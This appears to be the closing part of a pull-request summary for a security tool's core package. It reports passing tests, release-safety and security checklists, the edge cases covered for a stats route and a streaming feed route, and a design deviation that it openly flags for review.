All 30 targeted tests pass; `ruff check`, `ruff format --check`, and `lint-imports` are clean.

## Public-release safety (doberman-core only)
- [x] Contains nothing from the "not allowed" list: no enterprise/hosted code, no proprietary
  detection, no customer data, no secrets, no commercial-license code
- [x] Core still builds/tests/runs with NO enterprise package installed
  (`test_core_is_standalone.py` passes; `doberman.dash` stays a lazy import gated behind the
  optional `dash` extra)

## Security checklist
- [x] Fails closed on error / uncertainty (`build_stats`/`read_decisions`/`read_decisions_since`
  all fail closed to empty/zero on a missing DB or any read error; `_current_enforcement` falls
  back to `"enforce"` on any failure)
- [x] No secret, full file, or unredacted prompt logged or committed (see the redaction-guarantee
  test above; both routes only ever serialize already-redacted log columns)
- [x] Any guardrail/learning change is raise-only (no silent loosening) — N/A, this slice adds no
  guardrail/learning logic
- [x] Every BLOCK/AUTH carries reason codes + a human explanation — unchanged (this slice only
  reads existing decision rows, never writes/alters one)
- [x] doberman-core does not import doberman_enterprise (`lint-imports` contract kept)

## Edge cases covered / Deviations from plan / Risks introduced

**Edge cases covered:** empty/missing `.doberman/doberman.db` (both routes 200, zero/empty);
wrong/missing token on both header and (for feed) query-param auth; a secret-shaped raw target
never leaking through either route; a tampered/markup-shaped row rendering as literal text in
the feed UI.

**Deviations from the plan / notable design decision:** the plan asked for "a short poll interval
injected/overridable for tests" so the feed test "reads a bounded chunk from the stream, then
close — don't hang the test." Implementing that surfaced a constraint worth flagging explicitly:
both `starlette.testclient.TestClient` and `httpx.ASGITransport` (the installed versions) fully
await an ASGI app's response body before returning anything — there is no true incremental read
available in this stack. So beyond an overridable `feed_poll_interval`, `create_app`/the feed
route factory also take a `feed_max_polls` (default `None` = unbounded in production; a real
uvicorn socket streams every yield incrementally as designed). Tests pass a small integer so the
generator provably terminates and the whole test-client call completes. This is an addition to
what the plan named outright, driven by how the installed test-client versions behave — flagging
it for review rather than assuming it's uncontroversial.

**Risks / tech debt:** none identified. The `max_polls` parameter only affects testability; the
production code path (`max_polls=None`) is a plain unbounded async generator, identical in shape
to a normal long-lived SSE handler.
